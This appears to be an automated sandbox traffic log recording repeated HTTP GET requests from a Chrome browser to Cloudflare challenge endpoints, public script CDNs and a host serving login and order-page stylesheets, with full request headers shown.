          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8fa532ef18b9435c/1735594940555/c281c98da1c4ac9f168264b8621e465a54d01427d1008fed8de2e3729547d7f2/f_xc1VlLEk-hP_t HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/jquery-ui.structure.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/jquery-ui.theme.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/axit-jquery.dialog.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bs32c.golfercaps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bs32c.golfercaps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/axit-jquery.datepicker.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bs32c.golfercaps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bs32c.golfercaps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/axit-jquery.autocomplete.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bs32c.golfercaps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bs32c.golfercaps.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bs32c.golfercaps.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/jquery.menu.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/stdweborder.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/mePanel.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/meBubble.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/_.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/login.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
